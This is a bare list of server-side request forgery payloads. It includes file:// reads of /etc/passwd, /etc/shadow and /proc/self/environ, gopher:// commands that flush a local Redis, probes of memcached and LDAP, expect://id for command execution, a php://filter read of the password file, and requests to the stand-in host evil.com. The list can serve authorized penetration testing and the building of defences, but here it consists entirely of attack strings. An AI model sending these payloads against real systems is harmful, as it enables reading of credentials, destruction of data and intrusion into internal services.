# SSRF Protocol/Scheme Payloads
file:///etc/passwd
file:///etc/hosts
file:///etc/hostname
file:///etc/shadow
file:///proc/self/environ
file:///proc/self/cmdline
file:///proc/self/cwd
file:///proc/self/fd/0
file:///proc/version
file:///proc/net/tcp
file:///proc/net/fib_trie
file:///proc/sched_debug
file:///C:/Windows/win.ini
file:///C:/Windows/System32/drivers/etc/hosts
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
gopher://127.0.0.1:11211/_stats%0d%0a
dict://127.0.0.1:6379/info
dict://127.0.0.1:11211/stats
ftp://127.0.0.1/
sftp://evil.com/
tftp://evil.com/file
ldap://127.0.0.1/%0astats%0aquit
ldap://evil.com/
jar:http://evil.com/test.jar!/
netdoc:///etc/passwd
expect://id
php://filter/read=convert.base64-encode/resource=/etc/passwd
data://text/plain;base64,aWQ=
